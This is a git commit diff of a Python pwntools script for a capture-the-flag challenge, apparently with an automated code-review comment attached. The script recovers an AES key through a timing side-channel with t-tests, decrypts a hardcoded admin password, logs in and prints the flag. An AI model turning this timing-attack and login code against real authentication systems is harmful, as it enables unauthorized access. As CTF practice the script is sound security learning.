The automated attack now goes all the way to fetching the flag

This commit is contained in:
2019-07-02 19:13:17 +02:00
parent 28fe1a971f
commit de80694af5


@@ -6,6 +6,8 @@ import string
import math import math
import threading import threading
from Crypto.Cipher import AES
#context.log_level = "debug" #context.log_level = "debug"
allowed_chars = string.ascii_letters + string.digits + string.punctuation allowed_chars = string.ascii_letters + string.digits + string.punctuation
@@ -51,7 +53,7 @@ def gather_measurements_(r, amount, total_amount, measurements, progress, lock):
r.recvuntil(b"> ") r.recvuntil(b"> ")
password = ''.join(random.choices(allowed_chars, k=16)).encode("ascii") password = ''.join(random.choices(allowed_chars, k=16)).encode("ascii")
r.send(b"login\n") r.send(b"login\n")
r.send(password) r.send("admin")
r.send(b"\n") r.send(b"\n")
r.send(password) r.send(password)
r.send(b"\n") r.send(b"\n")
@@ -87,11 +89,11 @@ def t_test(group_big, group_small):
variance_small = variance(group_small, mean_small) variance_small = variance(group_small, mean_small)
return (mean_big - mean_small) / math.sqrt(variance_big / len(group_big) + variance_small / len(group_small)) return (mean_big - mean_small) / math.sqrt(variance_big / len(group_big) + variance_small / len(group_small))
#remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/default/secutech")] remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/meson.debug.linux.x86_64/secutech", cwd="/home/manuel/wolke/Projects/secutech_authenticator")]
remotes = [] #remotes = []
no_threads = 50 #no_threads = 50
for i in range(no_threads): #for i in range(no_threads):
remotes.append(remote("ccn.li", "5555")) # remotes.append(remote("ccn.li", "5555"))
for r in remotes: for r in remotes:
r.recvuntil(b"> ") r.recvuntil(b"> ")
@@ -134,7 +136,7 @@ while len(key) < 16:
# The biggest value in the list is our best guess for the value # The biggest value in the list is our best guess for the value
max_t_value = max(t_values) max_t_value = max(t_values)
candidate = t_values.index(max_t_value) candidate = t_values.index(max_t_value)
progress.success("{:02X} ({:.2})".format(candidate, max_t_value)) progress.success("{:02X} ({:})".format(candidate, max_t_value))
# Check if we are certain enough to add this result to the key. If not stop attacking and gather more measurements # Check if we are certain enough to add this result to the key. If not stop attacking and gather more measurements
if max_t_value >= 4.5: if max_t_value >= 4.5:
@@ -142,7 +144,18 @@ while len(key) < 16:
else: else:
break break
encrypted_adminpw = bytes([0xe3, 0x07, 0x2e, 0x9f, 0x5b, 0xe8, 0xed, 0xd6, 0x02, 0xab, 0x89, 0xb8, 0xeb, 0x49, 0xcc, 0x56])
aes = AES.new(bytes(key), AES.MODE_ECB)
adminpw = aes.decrypt(encrypted_adminpw)
remotes[0].send("login\nadmin\n")
remotes[0].send(adminpw)
remotes[0].send("\n")
remotes[0].recvuntil("Password: ")
flag = remotes[0].recvuntil("\n")
for r in remotes: for r in remotes:
r.close() r.close()
print("Key:", " ".join(["{:02X}".format(k) for k in key])) print("Key:", " ".join(["{:02X}".format(k) for k in key]))
print("Adminpw:", adminpw.decode("ascii"))
print("Flag:", flag.decode("ascii"))
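Review bot: `adminpw.decode("ascii")` on the second-to-last line of the hunk raises UnicodeDecodeError whenever the recovered key is wrong, because AES-ECB decryption of a 16-byte block under a wrong key yields arbitrary bytes rather than an error, so the script dies right after printing the key instead of reporting the mismatch; `print("Adminpw:", adminpw.decode("ascii", errors="replace"))` keeps the output useful, and `flag.decode("ascii").rstrip("\n")` drops the newline that `recvuntil("\n")` leaves in `flag`. The new lines also mix `str` and `bytes` arguments — `r.send("admin")` in the second hunk, `remotes[0].send("login\nadmin\n")` and `recvuntil("Password: ")` here — while the surrounding code passes `b"..."` literals; the bytes form is the one whose behaviour does not depend on the pwntools version and `context.encoding`. If the `break` above this block exits the `while len(key) < 16` loop with fewer than 16 bytes collected, `AES.new(bytes(key), AES.MODE_ECB)` fails with a key-length ValueError; the rendered view has lost the indentation, so whether the decrypt step runs inside or after that loop is inferred from the hunk header. The `encrypted_adminpw` literal carries no comment on its provenance; a one-line `# TODO(owner): record where this ciphertext was obtained` would help the next reader.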